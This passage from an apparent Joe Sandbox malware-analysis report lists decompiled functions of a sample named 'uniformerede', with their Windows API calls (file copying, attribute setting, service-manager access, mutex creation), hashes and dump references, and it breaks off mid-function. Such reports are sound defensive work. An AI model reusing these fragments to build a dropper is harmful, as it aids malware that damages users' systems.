                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1404682716-0
                                                                                                                                                                                                                            • Opcode ID: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                                                                                                                                                                                            • Instruction ID: 9fe47824b19111ae0d82b188d774791a2e79eaf21524d9292fd64a79079edc68
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87216DF5900285AFEB20AF66C48475677E1AF95314F14887B9A04A62C6D37CDCD0CB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				void** _v24;
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				void** _t16;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				intOrPtr* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v24 = __ecx;
                                                                                                                                                                                                                            				 *_t32 = __edx;
                                                                                                                                                                                                                            				_t31 = __eax & 0xfffff000;
                                                                                                                                                                                                                            				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                                                                                                                                                            				 *_v24 = _t31;
                                                                                                                                                                                                                            				_t15 = _v20 - _t31;
                                                                                                                                                                                                                            				_v24[1] = _t15;
                                                                                                                                                                                                                            				_t29 =  *0x49e5ec; // 0x49e5ec
                                                                                                                                                                                                                            				while(_t29 != 0x49e5ec) {
                                                                                                                                                                                                                            					_t7 = _t29 + 8; // 0x0
                                                                                                                                                                                                                            					_t17 =  *_t7;
                                                                                                                                                                                                                            					_t8 = _t29 + 0xc; // 0x0
                                                                                                                                                                                                                            					_t27 =  *_t8 + _t17;
                                                                                                                                                                                                                            					if(_t31 > _t17) {
                                                                                                                                                                                                                            						_t17 = _t31;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t27 > _v20) {
                                                                                                                                                                                                                            						_t27 = _v20;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t27 > _t17) {
                                                                                                                                                                                                                            						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                                                                                                                                                                            						if(_t15 == 0) {
                                                                                                                                                                                                                            							_t16 = _v24;
                                                                                                                                                                                                                            							 *_t16 = 0;
                                                                                                                                                                                                                            							return _t16;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t29 =  *_t29;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t15;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004017B5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 4275171209-1966777607
                                                                                                                                                                                                                            • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                                                            • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E004738BC(char __eax, signed int __ebx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				intOrPtr* _t11;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				_push(_t28);
                                                                                                                                                                                                                            				_push(0x473922);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t28;
                                                                                                                                                                                                                            				_t11 =  *0x49de34; // 0x49b0ec
                                                                                                                                                                                                                            				if( *_t11 == 2) {
                                                                                                                                                                                                                            					_t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
                                                                                                                                                                                                                            					if((__ebx & 0xffffff00 | _t14 != 0x00000000) != 0) {
                                                                                                                                                                                                                            						CloseServiceHandle(_t14);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t25);
                                                                                                                                                                                                                            				 *[fs:eax] = _t25;
                                                                                                                                                                                                                            				_push(0x473929);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922), ref: 004738F8
                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922), ref: 00473907
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandleManagerOpenService
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1199824460-0
                                                                                                                                                                                                                            • Opcode ID: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                                                                                                                                                                                            • Instruction ID: 9747779068363641c57f556ad18b80e8a6fd65f6f560b6840aedc400607e3997
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fdb9b70dbb00de11f3476dfc7ba33594891e3983922fd245e65b3b845590b37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F0F0F0640308AFD701EB65DD03AAB7BECEB46701BA14477FA04A7292DA789E04E518
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458384(void* __eax) {
                                                                                                                                                                                                                            				struct HICON__* _t5;
                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t11;
                                                                                                                                                                                                                            				CHAR** _t12;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t13 = __eax;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                                                                                                                                                                                            				_t8 = 0xffffffea;
                                                                                                                                                                                                                            				_t12 = 0x49befc;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                                                                                                                                                                                                            						if(_t8 != 0xffffffeb) {
                                                                                                                                                                                                                            							_t11 = 0;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                            						_t11 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                                                                                                                                                                                                            					_t7 = E0045843C(_t13, _t5, _t8);
                                                                                                                                                                                                                            					_t8 = _t8 + 1;
                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                            				} while (_t8 != 0xffffffff);
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CursorLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3238433803-0
                                                                                                                                                                                                                            • Opcode ID: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                                                            • Instruction ID: e70e3c34bb26c70f92347ae4735de209fc646f551b3d90022d55a82ec6438589
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFF08261B04204579A20563E5CC1A7E7288DBD6B36B60033FFD39E77D2CF2E6C46425A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A90(void* __eax, long __edx) {
                                                                                                                                                                                                                            				int _t4;
                                                                                                                                                                                                                            				long _t7;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t7 = 0;
                                                                                                                                                                                                                            				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed
                                                                                                                                                                                                                            				if(_t4 == 0) {
                                                                                                                                                                                                                            					_t7 = GetLastError();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AA2
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1799206407-0
                                                                                                                                                                                                                            • Opcode ID: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                                                                                                                                                                                            • Instruction ID: a8da59a57bdf58849924320cc2d236a07249c13e055f30f78d96cafe0e5643bb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABD0C9627051202A961065FF2C8195B818D8ED55A9301427FBA08E3292E568DC0A01BA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v9 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				_push(_t30);
                                                                                                                                                                                                                            				_push(0x4742ac);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t30 + 0xfffffff8;
                                                                                                                                                                                                                            				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
                                                                                                                                                                                                                            				_t27 = _t13;
                                                                                                                                                                                                                            				if(GetLastError() != 0xb7) {
                                                                                                                                                                                                                            					if(_t27 != 0 && _v9 == 0) {
                                                                                                                                                                                                                            						CloseHandle(_t27);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t25);
                                                                                                                                                                                                                            				 *[fs:eax] = _t25;
                                                                                                                                                                                                                            				_push(0x4742b3);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,004742AC), ref: 00474276
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,004742AC), ref: 00474291
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4294037311-0
                                                                                                                                                                                                                            • Opcode ID: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                                                                                                                                                                                            • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t61 = __eflags;
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_t56 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t59);
                                                                                                                                                                                                                            				_push(0x4738af);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t59 + 0xfffffff0;
                                                                                                                                                                                                                            				if(E00409A48(_v12, _t61) != 0) {
                                                                                                                                                                                                                            					E00404BB8( &_v16, E00404E80(_v12));
                                                                                                                                                                                                                            					E00409A90(_v16, 0x80);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t44 = E00404E80(_v12);
                                                                                                                                                                                                                            				CopyFileA(E00404E80(_v8), _t25, 0); // executed
                                                                                                                                                                                                                            				E00404BB8( &_v20, _t44);
                                                                                                                                                                                                                            				E00409A90(_v20, _t56);
                                                                                                                                                                                                                            				_pop(_t51);
                                                                                                                                                                                                                            				 *[fs:eax] = _t51;
                                                                                                                                                                                                                            				_push(0x4738b6);
                                                                                                                                                                                                                            				return E004049E4( &_v20, 4);
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CopyFileA.KERNEL32 ref: 0047387B
                                                                                                                                                                                                                              • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AA2
                                                                                                                                                                                                                              • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$AttributesCopyErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2414470624-0
                                                                                                                                                                                                                            • Opcode ID: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                                                                                                                                                                                            • Instruction ID: 249739c2ab59324f255857505799179cd9e45a8e1fd9df759088737bab44b84f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C1116B0E001099BDB00EFAAD88299EB7F9FF44714F51457BF514B3391DB389E058A98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t20;
                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t38 = _t40;
                                                                                                                                                                                                                            				_push(_t22);
                                                                                                                                                                                                                            				_t35 = _t22;
                                                                                                                                                                                                                            				_t20 = __edx;
                                                                                                                                                                                                                            				_t32 = __eax;
                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                            					_t20 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
                                                                                                                                                                                                                            				_t43 = _t10;
                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
                                                                                                                                                                                                                            					_push(_t38);
                                                                                                                                                                                                                            					_push(0x41a890);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t40;
                                                                                                                                                                                                                            					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
                                                                                                                                                                                                                            					 *_t35 = _t15;
                                                                                                                                                                                                                            					_pop(_t30);
                                                                                                                                                                                                                            					 *[fs:eax] = _t30;
                                                                                                                                                                                                                            					_push(E0041A897);
                                                                                                                                                                                                                            					return E00403BEC(_v8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindResource
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1635176832-0
                                                                                                                                                                                                                            • Opcode ID: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                                                                                                                                                                                            • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E00407A8A(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                                                                                                                                                                                            				CHAR* _v8;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                            				CHAR* _t31;
                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(_t31);
                                                                                                                                                                                                                            				_v8 = _t31;
                                                                                                                                                                                                                            				_t38 = __eax;
                                                                                                                                                                                                                            				_t13 = E00402C0C();
                                                                                                                                                                                                                            				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                                                                                                                                                            				E00402BFC(_t13);
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                                            • Opcode ID: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                                                                                                                                                                                            • Instruction ID: a8a80a8af59d526015255caeaaeb12d1c6418dce9794d9929da9e8c0ec6d85c8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0045A28C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                            				char _t41;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t37 = __edx;
                                                                                                                                                                                                                            				_t27 = __eax;
                                                                                                                                                                                                                            				_push(_t40);
                                                                                                                                                                                                                            				_push(0x45a30e);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t40;
                                                                                                                                                                                                                            				_t41 =  *((char*)(__eax + 0xa4));
                                                                                                                                                                                                                            				if(_t41 == 0) {
                                                                                                                                                                                                                            					_t7 = _t27 + 0x8c; // 0x8c
                                                                                                                                                                                                                            					E00404A14(_t7, __edx);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E0045A240(__eax,  &_v8);
